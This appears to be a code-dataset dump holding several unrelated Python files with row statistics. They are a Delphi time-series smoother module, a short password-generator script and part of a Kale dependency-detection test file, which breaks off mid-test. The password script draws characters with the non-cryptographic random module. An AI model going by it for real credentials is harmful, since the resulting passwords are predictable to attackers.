>>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=0, window_length=28,
gaussian_bandwidth=144)
>>> smoothed_signal = smoother.smooth(signal)
Example 4. Apply a local linear regression smoother (essentially equivalent to
`left_gauss_linear`), with 95% weight on the recent week and a sharp
cutoff after 3 weeks.
>>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=1, window_length=21,
gaussian_bandwidth=36)
>>> smoothed_signal = smoother.smooth(signal)
Example 5. Apply the identity function (simplifies code that iterates through smoothers _and_
expects a copy of the raw data).
>>> smoother = Smoother(smoother_name='identity')
>>> smoothed_signal = smoother.smooth(signal)
"""
def __init__(
self,
smoother_name="savgol",
poly_fit_degree=2,
window_length=28,
gaussian_bandwidth=144, # a ~2 week window
impute_method=None,
minval=None,
boundary_method="shortened_window",
):
"""See class docstring."""
self.smoother_name = smoother_name
self.poly_fit_degree = poly_fit_degree
self.window_length = window_length
self.gaussian_bandwidth = gaussian_bandwidth
self.impute_method = self._select_imputer(impute_method, self.smoother_name)
self.minval = minval
self.boundary_method = boundary_method
valid_smoothers = {"savgol", "left_gauss_linear", "moving_average", "identity"}
valid_impute_methods = {"savgol", "zeros", "identity"}
valid_boundary_methods = {"shortened_window", "identity", "nan"}
if self.smoother_name not in valid_smoothers:
raise ValueError("Invalid smoother_name given.")
if self.impute_method not in valid_impute_methods:
raise ValueError("Invalid impute_method given.")
if self.boundary_method not in valid_boundary_methods:
raise ValueError("Invalid boundary_method given.")
if self.window_length <= 1:
raise ValueError("Window length is too short.")
if smoother_name == "savgol":
# The polynomial fitting is done on a past window of size window_length
# including the current day value.
self.coeffs = self.savgol_coeffs(
-self.window_length + 1, 0, self.poly_fit_degree
)
else:
self.coeffs = None
def smooth(
self, signal: Union[np.ndarray, pd.Series], impute_order=2
) -> Union[np.ndarray, pd.Series]:
"""Apply a smoother to a signal.
The major workhorse smoothing function. Imputes the nans and then applies
a smoother to the signal.
Parameters
----------
signal: np.ndarray or pd.Series
A 1D signal to be smoothed.
impute_order: int
The polynomial order of the fit used for imputation. By default, this is set to
2.
Returns
----------
signal_smoothed: np.ndarray or pd.Series
A smoothed 1D signal. Returns an array of the same type and length as
the input.
"""
# If all nans, pass through
if np.all(np.isnan(signal)):
return signal
is_pandas_series = isinstance(signal, pd.Series)
pandas_index = signal.index if is_pandas_series else None
signal = signal.to_numpy() if is_pandas_series else signal
# Find where the first non-nan value is located and truncate the initial nans
ix = np.where(~np.isnan(signal))[0][0]
signal = signal[ix:]
# Don't smooth in certain edge cases
if len(signal) < self.poly_fit_degree or len(signal) == 1:
signal_smoothed = signal.copy()
else:
# Impute
signal = self.impute(signal, impute_order=impute_order)
# Smooth
signal_smoothed = self._select_smoother()(signal)
# Append the nans back, since we want to preserve length
signal_smoothed = np.hstack([np.nan * np.ones(ix), signal_smoothed])
# Convert back to pandas if necessary
if is_pandas_series:
signal_smoothed = pd.Series(signal_smoothed)
signal_smoothed.index = pandas_index
return signal_smoothed
def _select_smoother(self):
"""Select a smoothing method based on the smoother type."""
if self.smoother_name == "savgol":
return self.savgol_smoother
if self.smoother_name == "left_gauss_linear":
return self.left_gauss_linear_smoother
if self.smoother_name == "moving_average":
return self.moving_average_smoother
if self.smoother_name == "identity":
return lambda x: x
raise ValueError(f"invalid smoother {self.smoother_name}")
def impute(self, signal, impute_order=2):
"""Impute the nan values in the signal.
See the class docstring for an explanation of the impute methods.
Parameters
----------
signal: np.ndarray
1D signal to be imputed.
impute_order: int
The polynomial order of the fit used for imputation.
Returns
-------
imputed_signal: np.ndarray
Imputed signal.
"""
if self.impute_method == "savgol":
# We cannot impute if the signal begins with a NaN (there is no information to go by).
# To preserve input-output array lengths, this util will not drop NaNs for you.
if np.isnan(signal[0]):
raise ValueError("The signal should not begin with a nan value.")
imputed_signal = self.savgol_impute(signal, impute_order)
elif self.impute_method == "zeros":
imputed_signal = np.nan_to_num(signal)
elif self.impute_method == "identity":
imputed_signal = np.copy(signal)
return imputed_signal
def moving_average_smoother(self, signal):
"""Compute a moving average on the signal.
Parameters
----------
signal: np.ndarray
Input array.
Returns
-------
signal_smoothed: np.ndarray
An array with the same length as arr, but the first window_length-1
entries are np.nan.
"""
if not isinstance(self.window_length, int):
raise ValueError("k must be int.")
signal_padded = np.append(np.nan * np.ones(self.window_length - 1), signal)
signal_smoothed = (
np.convolve(
signal_padded, np.ones(self.window_length, dtype=int), mode="valid"
)
/ self.window_length
)
return signal_smoothed
def left_gauss_linear_smoother(self, signal):
"""Smooth the y-values using a local linear regression with Gaussian weights.
DEPRECATED: This method is available to help sanity check the 'savgol' method.
Use 'savgol' with poly_fit_degree=1 and the appropriate gaussian_bandwidth instead.
At each time t, we use the data from times 1, ..., t-dt, weighted
using the Gaussian kernel, to produce the estimate at time t.
Parameters
----------
signal: np.ndarray
A 1D signal.
Returns
----------
signal_smoothed: np.ndarray
A smoothed 1D signal.
"""
warnings.warn(
"Use the savgol smoother with poly_fit_degree=1 instead.",
DeprecationWarning,
)
n = len(signal)
signal_smoothed = np.zeros_like(signal)
# A is the regression design matrix
A = np.vstack([np.ones(n), np.arange(n)]).T # pylint: disable=invalid-name
for idx in range(n):
weights = np.exp(
-((np.arange(idx + 1) - idx) ** 2) / self.gaussian_bandwidth
)
AwA = np.dot( # pylint: disable=invalid-name
A[: (idx + 1), :].T * weights, A[: (idx + 1), :]
)
Awy = np.dot( # pylint: disable=invalid-name
A[: (idx + 1), :].T * weights, signal[: (idx + 1)].reshape(-1, 1)
)
try:
beta = np.linalg.solve(AwA, Awy)
signal_smoothed[idx] = np.dot(A[: (idx + 1), :], beta)[-1]
except np.linalg.LinAlgError:
signal_smoothed[idx] = (
signal[idx] # pylint: disable=using-constant-test
if self.impute
else np.nan
)
if self.minval is not None:
signal_smoothed[signal_smoothed <= self.minval] = self.minval
return signal_smoothed
def savgol_predict(self, signal, poly_fit_degree, nr):
"""Predict a single value using the savgol method.
Fits a polynomial through the values given by the signal and returns the value
of the polynomial at the right-most signal-value. More precisely, for a signal of length
n, fits a poly_fit_degree polynomial through the points signal[-n+1+nr], signal[-n+2+nr],
..., signal[nr], and returns the evaluation of the polynomial at signal[0]. Hence, if
nr=0, then the last value of the signal is smoothed, and if nr=-1, then the value after
the last signal value is anticipated.
Parameters
----------
signal: np.ndarray
A 1D signal to smooth.
poly_fit_degree: int
The degree of the polynomial fit.
nr: int
An integer that determines the position of the predicted value relative to the signal.
Returns
----------
predicted_value: float
The anticipated value that comes after the end of the signal based on a polynomial fit.
"""
coeffs = self.savgol_coeffs(-len(signal) + 1 + nr, nr, poly_fit_degree)
predicted_value = signal @ coeffs
return predicted_value
def savgol_coeffs(self, nl, nr, poly_fit_degree):
"""Solve for the Savitzky-Golay coefficients.
Solves for the Savitzky-Golay coefficients. The coefficients c_i
give a filter so that
y = sum_{i=-{n_l}}^{n_r} c_i x_i
is the value at 0 (thus the constant term) of the polynomial fit
through the points {x_i}. The coefficients are c_i are calculated as
c_i = ((A.T @ A)^(-1) @ (A.T @ e_i))_0
where A is the design matrix of the polynomial fit and e_i is the standard
basis vector i. This is currently done via a full inversion, which can be
optimized.
Parameters
----------
nl: int
The left window bound for the polynomial fit, inclusive.
nr: int
The right window bound for the polynomial fit, inclusive.
poly_fit_degree: int
The degree of the polynomial to be fit.
Returns
----------
coeffs: np.ndarray
A vector of coefficients of length nr - nl + 1 that determines the savgol
convolution filter.
"""
if nl >= nr:
raise ValueError("The left window bound should be less than the right.")
if nr > 0:
warnings.warn("The filter is no longer causal.")
A = np.vstack( # pylint: disable=invalid-name
[np.arange(nl, nr + 1) ** j for j in range(poly_fit_degree + 1)]
).T
if self.gaussian_bandwidth is None:
mat_inverse = np.linalg.inv(A.T @ A) @ A.T
else:
weights = np.exp(-((np.arange(nl, nr + 1)) ** 2) / self.gaussian_bandwidth)
mat_inverse = np.linalg.inv((A.T * weights) @ A) @ (A.T * weights)
window_length = nr - nl + 1
coeffs = np.zeros(window_length)
for i in range(window_length):
basis_vector = np.zeros(window_length)
basis_vector[i] = 1.0
coeffs[i] = (mat_inverse @ basis_vector)[0]
return coeffs
def savgol_smoother(self, signal): # pylint: disable=inconsistent-return-statements
"""Smooth signal with the savgol smoother.
Returns a convolution of the 1D signal with the Savitzky-Golay coefficients, respecting
boundary effects. For an explanation of boundary effects methods, see the class docstring.
Parameters
----------
signal: np.ndarray
A 1D signal.
Returns
----------
signal_smoothed: np.ndarray
A smoothed 1D signal of same length as signal.
"""
# Reverse because np.convolve reverses the second argument
temp_reversed_coeffs = np.array(list(reversed(self.coeffs)))
# Smooth the part of the signal away from the boundary first
signal_padded = np.append(np.nan * np.ones(len(self.coeffs) - 1), signal)
signal_smoothed = np.convolve(signal_padded, temp_reversed_coeffs, mode="valid")
# This section handles the smoothing behavior at the (left) boundary:
# - shortened_window (default) applies savgol with a smaller window to do the fit
# - identity keeps the original signal (doesn't smooth)
# - nan writes nans
if self.boundary_method == "nan":
return signal_smoothed
# boundary methods "identity" and "shortened window"
for ix in range(min(len(self.coeffs), len(signal))):
if ix == 0 or self.boundary_method == "identity":
signal_smoothed[ix] = signal[ix]
else:
# At the very edge, the design matrix is often singular, in which case
# we just fall back to the raw signal
try:
signal_smoothed[ix] = self.savgol_predict(
signal[: ix + 1], self.poly_fit_degree, 0
)
except np.linalg.LinAlgError: # for small ix, the design matrix is singular
signal_smoothed[ix] = signal[ix]
return signal_smoothed
def savgol_impute(self, signal, impute_order):
"""Impute the nan values in signal using savgol.
This method fills the nan values in the signal with polynomial interpolation
on a rolling window of the immediate past up to window_length data points.
A number of boundary cases are handled involving nan filling close to the boundary.
Note that in the case of many adjacent nans, the method will use previously
imputed values to do the fitting for later values.
Parameters
----------
signal: np.ndarray
A 1D signal to be imputed.
impute_order: int
The polynomial order of the fit used for imputation.
Returns
----------
signal_imputed: np.ndarray
An imputed 1D signal.
"""
if impute_order > self.window_length:
raise ValueError("Impute order must be smaller than window length.")
signal_imputed = np.copy(signal)
for ix in np.where(np.isnan(signal_imputed))[0]:
# Boundary cases
if ix < self.window_length:
# At the boundary, a single value should just be extended
if ix == 1:
signal_imputed[ix] = signal_imputed[ix - 1]
# Otherwise, use savgol fitting on the largest window prior,
# reduce the polynomial degree if needed (can't fit if the
# imputation order is larger than the available data)
else:
signal_imputed[ix] = self.savgol_predict(
signal_imputed[:ix], min(ix - 1, impute_order), -1
)
# Away from the boundary, use savgol fitting on a fixed window
else:
signal_imputed[ix] = self.savgol_predict(
signal_imputed[ix - self.window_length : ix],
impute_order,
-1,
)
return signal_imputed
| 42.157371 | 100 | 0.615933 | """Smoother utility.
This file contains the smoothing utility functions. We have a number of
possible smoothers to choose from: windowed average, local weighted regression,
and a causal Savitzky-Golay filter.
Code is courtesy of Dmitry Shemetov, Maria Jahja, and Addison Hu.
These smoothers are all functions that take a 1D numpy array and return a smoothed
1D numpy array of the same length (with a few np.nans in the beginning). See the
docstrings for details.
"""
from typing import Union
import warnings
import numpy as np
import pandas as pd
class Smoother: # pylint: disable=too-many-instance-attributes
"""Smoother class.
This is the smoothing utility class. This class holds the parameter settings for its smoother
methods and provides reasonable defaults. Basic usage can be found in the examples below.
The smoother function takes numpy arrays or pandas Series as input, expecting the values to be
on a regularly-spaced time grid. NANs are ok, as long as the array does not begin with a NAN.
The rest of the NANs will be handled via imputation by default, though this can be turned off.
Parameters
----------
smoother_name: {'savgol', 'moving_average', 'identity', 'left_gauss_linear'}
This variable specifies the smoother. We have four smoothers, currently:
* 'savgol' or a Savtizky-Golay smoother (default)
* 'moving_average' or a moving window average smoother
* 'identity' or the trivial smoother (no smoothing)
* 'left_gauss_linear' or a Gaussian-weight linear regression smoother
Descriptions of the smoothers are available in the doc strings. Full mathematical
details are in: https://github.com/cmu-delphi/covidcast-modeling/ in the folder
'indicator_smoother'.
poly_fit_degree: int
A parameter for the 'savgol' smoother which sets the degree of the polynomial fit.
window_length: int
The length of the fitting window for 'savgol' and the averaging window 'moving_average'.
This value is in the units provided by the data, which are likely to be days for Delphi.
Note that if window_length is smaller than the length of the signal, then only the
imputation method is run on the signal.
gaussian_bandwidth: float or None
If float, all regression is done with Gaussian weights whose variance is
half the gaussian_bandwidth. If None, performs unweighted regression. (Applies
to 'left_gauss_linear' and 'savgol'.)
Here are some reference values (the given bandwidth produces a 95% weighting on
the data of length time window into the past):
time window | bandwidth
7 36
14 144
21 325
28 579
35 905
42 1303
impute: {'savgol', 'zeros', None}
If 'savgol' (default), will fill nan values with a savgol fit on the largest available time
window prior (up to window_length). If 'zeros', will fill nan values with zeros.
If None, leaves the nans in place.
minval: float or None
The smallest value to allow in a signal. If None, there is no smallest value.
Currently only implemented for 'left_gauss_linear'. This should probably not be in the scope
of the smoothing utility.
boundary_method: {'shortened_window', 'identity', 'nan'}
Determines how the 'savgol' method handles smoothing at the (left) boundary, where the past
data length is shorter than the window_length parameter. If 'shortened_window', it uses the
maximum window available; at the very edge (generally up to poly_fit_degree) it keeps the
same value as the raw signal. If 'identity', it just keeps the raw signal. If 'nan', it
writes nans. For the other smoothing methods, 'moving_average' writes nans and
'left_gauss_linear' uses a shortened window.
Methods
----------
smooth: np.ndarray or pd.Series
Takes a 1D signal and returns a smoothed version.
The input and the output have the same length and type.
Example Usage
-------------
Example 1. Apply a rolling average smoother with a window of length 10.
>>> smoother = Smoother(smoother_name='moving_average', window_length=10)
>>> smoothed_signal = smoother.smooth(signal)
Example 2. Smooth a dataframe column.
>>> smoother = Smoother(smoother_name='savgol')
>>> df[col] = df[col].transform(smoother.smooth)
Example 3. Apply a rolling weighted average smoother, with 95% weight on the recent 2 weeks and
a sharp cutoff after 4 weeks.
>>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=0, window_length=28,
gaussian_bandwidth=144)
>>> smoothed_signal = smoother.smooth(signal)
Example 4. Apply a local linear regression smoother (essentially equivalent to
`left_gauss_linear`), with 95% weight on the recent week and a sharp
cutoff after 3 weeks.
>>> smoother = Smoother(smoother_name='savgol', poly_fit_degree=1, window_length=21,
gaussian_bandwidth=36)
>>> smoothed_signal = smoother.smooth(signal)
Example 5. Apply the identity function (simplifies code that iterates through smoothers _and_
expects a copy of the raw data).
>>> smoother = Smoother(smoother_name='identity')
>>> smoothed_signal = smoother.smooth(signal)
"""
def __init__(
self,
smoother_name="savgol",
poly_fit_degree=2,
window_length=28,
gaussian_bandwidth=144, # a ~2 week window
impute_method=None,
minval=None,
boundary_method="shortened_window",
):
"""See class docstring."""
self.smoother_name = smoother_name
self.poly_fit_degree = poly_fit_degree
self.window_length = window_length
self.gaussian_bandwidth = gaussian_bandwidth
self.impute_method = self._select_imputer(impute_method, self.smoother_name)
self.minval = minval
self.boundary_method = boundary_method
valid_smoothers = {"savgol", "left_gauss_linear", "moving_average", "identity"}
valid_impute_methods = {"savgol", "zeros", "identity"}
valid_boundary_methods = {"shortened_window", "identity", "nan"}
if self.smoother_name not in valid_smoothers:
raise ValueError("Invalid smoother_name given.")
if self.impute_method not in valid_impute_methods:
raise ValueError("Invalid impute_method given.")
if self.boundary_method not in valid_boundary_methods:
raise ValueError("Invalid boundary_method given.")
if self.window_length <= 1:
raise ValueError("Window length is too short.")
if smoother_name == "savgol":
# The polynomial fitting is done on a past window of size window_length
# including the current day value.
self.coeffs = self.savgol_coeffs(
-self.window_length + 1, 0, self.poly_fit_degree
)
else:
self.coeffs = None
def _select_imputer(self, impute_method, smoother_name):
if impute_method is None and smoother_name != "identity":
return "savgol"
if impute_method is None and smoother_name == "identity":
return "identity"
return impute_method
def smooth(
self, signal: Union[np.ndarray, pd.Series], impute_order=2
) -> Union[np.ndarray, pd.Series]:
"""Apply a smoother to a signal.
The major workhorse smoothing function. Imputes the nans and then applies
a smoother to the signal.
Parameters
----------
signal: np.ndarray or pd.Series
A 1D signal to be smoothed.
impute_order: int
The polynomial order of the fit used for imputation. By default, this is set to
2.
Returns
----------
signal_smoothed: np.ndarray or pd.Series
A smoothed 1D signal. Returns an array of the same type and length as
the input.
"""
# If all nans, pass through
if np.all(np.isnan(signal)):
return signal
is_pandas_series = isinstance(signal, pd.Series)
pandas_index = signal.index if is_pandas_series else None
signal = signal.to_numpy() if is_pandas_series else signal
# Find where the first non-nan value is located and truncate the initial nans
ix = np.where(~np.isnan(signal))[0][0]
signal = signal[ix:]
# Don't smooth in certain edge cases
if len(signal) < self.poly_fit_degree or len(signal) == 1:
signal_smoothed = signal.copy()
else:
# Impute
signal = self.impute(signal, impute_order=impute_order)
# Smooth
signal_smoothed = self._select_smoother()(signal)
# Append the nans back, since we want to preserve length
signal_smoothed = np.hstack([np.nan * np.ones(ix), signal_smoothed])
# Convert back to pandas if necessary
if is_pandas_series:
signal_smoothed = pd.Series(signal_smoothed)
signal_smoothed.index = pandas_index
return signal_smoothed
def _select_smoother(self):
"""Select a smoothing method based on the smoother type."""
if self.smoother_name == "savgol":
return self.savgol_smoother
if self.smoother_name == "left_gauss_linear":
return self.left_gauss_linear_smoother
if self.smoother_name == "moving_average":
return self.moving_average_smoother
if self.smoother_name == "identity":
return lambda x: x
raise ValueError(f"invalid smoother {self.smoother_name}")
def impute(self, signal, impute_order=2):
"""Impute the nan values in the signal.
See the class docstring for an explanation of the impute methods.
Parameters
----------
signal: np.ndarray
1D signal to be imputed.
impute_order: int
The polynomial order of the fit used for imputation.
Returns
-------
imputed_signal: np.ndarray
Imputed signal.
"""
if self.impute_method == "savgol":
# We cannot impute if the signal begins with a NaN (there is no information to go by).
# To preserve input-output array lengths, this util will not drop NaNs for you.
if np.isnan(signal[0]):
raise ValueError("The signal should not begin with a nan value.")
imputed_signal = self.savgol_impute(signal, impute_order)
elif self.impute_method == "zeros":
imputed_signal = np.nan_to_num(signal)
elif self.impute_method == "identity":
imputed_signal = np.copy(signal)
return imputed_signal
def moving_average_smoother(self, signal):
"""Compute a moving average on the signal.
Parameters
----------
signal: np.ndarray
Input array.
Returns
-------
signal_smoothed: np.ndarray
An array with the same length as arr, but the first window_length-1
entries are np.nan.
"""
if not isinstance(self.window_length, int):
raise ValueError("k must be int.")
signal_padded = np.append(np.nan * np.ones(self.window_length - 1), signal)
signal_smoothed = (
np.convolve(
signal_padded, np.ones(self.window_length, dtype=int), mode="valid"
)
/ self.window_length
)
return signal_smoothed
def left_gauss_linear_smoother(self, signal):
"""Smooth the y-values using a local linear regression with Gaussian weights.
DEPRECATED: This method is available to help sanity check the 'savgol' method.
Use 'savgol' with poly_fit_degree=1 and the appropriate gaussian_bandwidth instead.
At each time t, we use the data from times 1, ..., t-dt, weighted
using the Gaussian kernel, to produce the estimate at time t.
Parameters
----------
signal: np.ndarray
A 1D signal.
Returns
----------
signal_smoothed: np.ndarray
A smoothed 1D signal.
"""
warnings.warn(
"Use the savgol smoother with poly_fit_degree=1 instead.",
DeprecationWarning,
)
n = len(signal)
signal_smoothed = np.zeros_like(signal)
# A is the regression design matrix
A = np.vstack([np.ones(n), np.arange(n)]).T # pylint: disable=invalid-name
for idx in range(n):
weights = np.exp(
-((np.arange(idx + 1) - idx) ** 2) / self.gaussian_bandwidth
)
AwA = np.dot( # pylint: disable=invalid-name
A[: (idx + 1), :].T * weights, A[: (idx + 1), :]
)
Awy = np.dot( # pylint: disable=invalid-name
A[: (idx + 1), :].T * weights, signal[: (idx + 1)].reshape(-1, 1)
)
try:
beta = np.linalg.solve(AwA, Awy)
signal_smoothed[idx] = np.dot(A[: (idx + 1), :], beta)[-1]
except np.linalg.LinAlgError:
signal_smoothed[idx] = (
signal[idx] # pylint: disable=using-constant-test
if self.impute
else np.nan
)
if self.minval is not None:
signal_smoothed[signal_smoothed <= self.minval] = self.minval
return signal_smoothed
def savgol_predict(self, signal, poly_fit_degree, nr):
"""Predict a single value using the savgol method.
Fits a polynomial through the values given by the signal and returns the value
of the polynomial at the right-most signal-value. More precisely, for a signal of length
n, fits a poly_fit_degree polynomial through the points signal[-n+1+nr], signal[-n+2+nr],
..., signal[nr], and returns the evaluation of the polynomial at signal[0]. Hence, if
nr=0, then the last value of the signal is smoothed, and if nr=-1, then the value after
the last signal value is anticipated.
Parameters
----------
signal: np.ndarray
A 1D signal to smooth.
poly_fit_degree: int
The degree of the polynomial fit.
nr: int
An integer that determines the position of the predicted value relative to the signal.
Returns
----------
predicted_value: float
The anticipated value that comes after the end of the signal based on a polynomial fit.
"""
coeffs = self.savgol_coeffs(-len(signal) + 1 + nr, nr, poly_fit_degree)
predicted_value = signal @ coeffs
return predicted_value
def savgol_coeffs(self, nl, nr, poly_fit_degree):
"""Solve for the Savitzky-Golay coefficients.
Solves for the Savitzky-Golay coefficients. The coefficients c_i
give a filter so that
y = sum_{i=-{n_l}}^{n_r} c_i x_i
is the value at 0 (thus the constant term) of the polynomial fit
through the points {x_i}. The coefficients are c_i are calculated as
c_i = ((A.T @ A)^(-1) @ (A.T @ e_i))_0
where A is the design matrix of the polynomial fit and e_i is the standard
basis vector i. This is currently done via a full inversion, which can be
optimized.
Parameters
----------
nl: int
The left window bound for the polynomial fit, inclusive.
nr: int
The right window bound for the polynomial fit, inclusive.
poly_fit_degree: int
The degree of the polynomial to be fit.
Returns
----------
coeffs: np.ndarray
A vector of coefficients of length nr - nl + 1 that determines the savgol
convolution filter.
"""
if nl >= nr:
raise ValueError("The left window bound should be less than the right.")
if nr > 0:
warnings.warn("The filter is no longer causal.")
A = np.vstack( # pylint: disable=invalid-name
[np.arange(nl, nr + 1) ** j for j in range(poly_fit_degree + 1)]
).T
if self.gaussian_bandwidth is None:
mat_inverse = np.linalg.inv(A.T @ A) @ A.T
else:
weights = np.exp(-((np.arange(nl, nr + 1)) ** 2) / self.gaussian_bandwidth)
mat_inverse = np.linalg.inv((A.T * weights) @ A) @ (A.T * weights)
window_length = nr - nl + 1
coeffs = np.zeros(window_length)
for i in range(window_length):
basis_vector = np.zeros(window_length)
basis_vector[i] = 1.0
coeffs[i] = (mat_inverse @ basis_vector)[0]
return coeffs
def savgol_smoother(self, signal): # pylint: disable=inconsistent-return-statements
"""Smooth signal with the savgol smoother.
Returns a convolution of the 1D signal with the Savitzky-Golay coefficients, respecting
boundary effects. For an explanation of boundary effects methods, see the class docstring.
Parameters
----------
signal: np.ndarray
A 1D signal.
Returns
----------
signal_smoothed: np.ndarray
A smoothed 1D signal of same length as signal.
"""
# Reverse because np.convolve reverses the second argument
temp_reversed_coeffs = np.array(list(reversed(self.coeffs)))
# Smooth the part of the signal away from the boundary first
signal_padded = np.append(np.nan * np.ones(len(self.coeffs) - 1), signal)
signal_smoothed = np.convolve(signal_padded, temp_reversed_coeffs, mode="valid")
# This section handles the smoothing behavior at the (left) boundary:
# - shortened_window (default) applies savgol with a smaller window to do the fit
# - identity keeps the original signal (doesn't smooth)
# - nan writes nans
if self.boundary_method == "nan":
return signal_smoothed
# boundary methods "identity" and "shortened window"
for ix in range(min(len(self.coeffs), len(signal))):
if ix == 0 or self.boundary_method == "identity":
signal_smoothed[ix] = signal[ix]
else:
# At the very edge, the design matrix is often singular, in which case
# we just fall back to the raw signal
try:
signal_smoothed[ix] = self.savgol_predict(
signal[: ix + 1], self.poly_fit_degree, 0
)
except np.linalg.LinAlgError: # for small ix, the design matrix is singular
signal_smoothed[ix] = signal[ix]
return signal_smoothed
def savgol_impute(self, signal, impute_order):
"""Impute the nan values in signal using savgol.
This method fills the nan values in the signal with polynomial interpolation
on a rolling window of the immediate past up to window_length data points.
A number of boundary cases are handled involving nan filling close to the boundary.
Note that in the case of many adjacent nans, the method will use previously
imputed values to do the fitting for later values.
Parameters
----------
signal: np.ndarray
A 1D signal to be imputed.
impute_order: int
The polynomial order of the fit used for imputation.
Returns
----------
signal_imputed: np.ndarray
An imputed 1D signal.
"""
if impute_order > self.window_length:
raise ValueError("Impute order must be smaller than window length.")
signal_imputed = np.copy(signal)
for ix in np.where(np.isnan(signal_imputed))[0]:
# Boundary cases
if ix < self.window_length:
# At the boundary, a single value should just be extended
if ix == 1:
signal_imputed[ix] = signal_imputed[ix - 1]
# Otherwise, use savgol fitting on the largest window prior,
# reduce the polynomial degree if needed (can't fit if the
# imputation order is larger than the available data)
else:
signal_imputed[ix] = self.savgol_predict(
signal_imputed[:ix], min(ix - 1, impute_order), -1
)
# Away from the boundary, use savgol fitting on a fixed window
else:
signal_imputed[ix] = self.savgol_predict(
signal_imputed[ix - self.window_length : ix],
impute_order,
-1,
)
return signal_imputed
| 254 | 0 | 27 |
99c8d66d5dd27a05a085cb3dde8290a7fafd8184 | 460 | py | Python | main/generate_password.py | LukeScales1/password_generator | 6c8a5433db9e4552678310a86cc4a0fec93b6e3a | [
"Apache-2.0"
] | null | null | null | main/generate_password.py | LukeScales1/password_generator | 6c8a5433db9e4552678310a86cc4a0fec93b6e3a | [
"Apache-2.0"
] | null | null | null | main/generate_password.py | LukeScales1/password_generator | 6c8a5433db9e4552678310a86cc4a0fec93b6e3a | [
"Apache-2.0"
] | null | null | null | import string
import random
import argparse
parser = argparse.ArgumentParser(description='generate a password with x amount of randomised ascii characters')
parser.add_argument('x', metavar='N', type=int, help='length of desired password string')
args = parser.parse_args()
x = args.x
password_characters = string.ascii_letters + string.digits + string.punctuation
secret_key = ''.join(random.choice(password_characters) for i in range(x))
print secret_key
| 32.857143 | 112 | 0.791304 | import string
import random
import argparse
parser = argparse.ArgumentParser(description='generate a password with x amount of randomised ascii characters')
parser.add_argument('x', metavar='N', type=int, help='length of desired password string')
args = parser.parse_args()
x = args.x
password_characters = string.ascii_letters + string.digits + string.punctuation
secret_key = ''.join(random.choice(password_characters) for i in range(x))
print secret_key
| 0 | 0 | 0 |
54c900e0d3a7383313bb93037c4dc760768ea4ea | 14,793 | py | Python | backend/kale/tests/unit_tests/test_dependencies.py | noushi/kale | 1530ccc6dda3b8a02e2f58f50cfa682adfaf4b80 | [
"Apache-2.0"
] | null | null | null | backend/kale/tests/unit_tests/test_dependencies.py | noushi/kale | 1530ccc6dda3b8a02e2f58f50cfa682adfaf4b80 | [
"Apache-2.0"
] | null | null | null | backend/kale/tests/unit_tests/test_dependencies.py | noushi/kale | 1530ccc6dda3b8a02e2f58f50cfa682adfaf4b80 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The Kale Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from kale import Pipeline, Step
from kale.static_analysis import dependencies
@pytest.mark.parametrize("code,target", [
('', []),
('a = b', ['b']),
('a = foo(b)', ['foo', 'b']),
('a = b\nfoo(b)', ['b', 'foo']),
('foo(b)', ['foo', 'b'])
])
def test_pyflakes_report(code, target):
"""Tests pyflakes_report function."""
res = dependencies.pyflakes_report(code)
assert sorted(res) == sorted(target)
def test_detect_fns_free_variables():
"""Test the function returns the correct free variables."""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x", "math"}, {})}
assert target == dependencies.detect_fns_free_variables(source_code)
def test_detect_fns_free_variables_with_imports():
"""Test the function returns the correct free variables."""
imports_and_functions = """
import math
"""
source_code = '''
x = 5
def foo():
print(math.sqrt(x))
'''
target = {"foo": ({"x"}, {})}
assert target == dependencies.detect_fns_free_variables(
source_code,
imports_and_functions
)
def test_dependencies_detection_free_variable(dummy_nb_config):
"""Test dependencies detection with free variables."""
pipeline = Pipeline(dummy_nb_config)
_source = ['''
x = 5
''']
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ["x"]
assert sorted(pipeline.get_step("step2").ins) == ["x"]
assert sorted(pipeline.get_step("step2").outs) == ["foo", "x"]
assert sorted(pipeline.get_step("step3").ins) == ["foo", "x"]
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_inner_function(dummy_nb_config):
"""Test dependencies detection with inner functions."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
def bar(x):
print(x)
bar(5)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ['''
foo()
print(x)
''']
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == []
assert sorted(pipeline.get_step("step2").outs) == ['foo']
assert sorted(pipeline.get_step("step3").ins) == ['foo', 'x']
assert sorted(pipeline.get_step("step3").outs) == []
def test_dependencies_detection_inner_function_free_variable(dummy_nb_config):
"""Test dependencies detection with free variables and inner function."""
pipeline = Pipeline(dummy_nb_config)
_source = ["x = 5"]
pipeline.add_step(Step(name="step1", source=_source))
_source = ['''
def foo():
def bar():
print(x)
''']
pipeline.add_step(Step(name="step2", source=_source))
_source = ["foo()"]
pipeline.add_step(Step(name="step3", source=_source))
pipeline.add_edge("step1", "step2")
pipeline.add_edge("step2", "step3")
dependencies.dependencies_detection(pipeline)
assert sorted(pipeline.get_step("step1").ins) == []
assert sorted(pipeline.get_step("step1").outs) == ['x']
assert sorted(pipeline.get_step("step2").ins) == ['x']
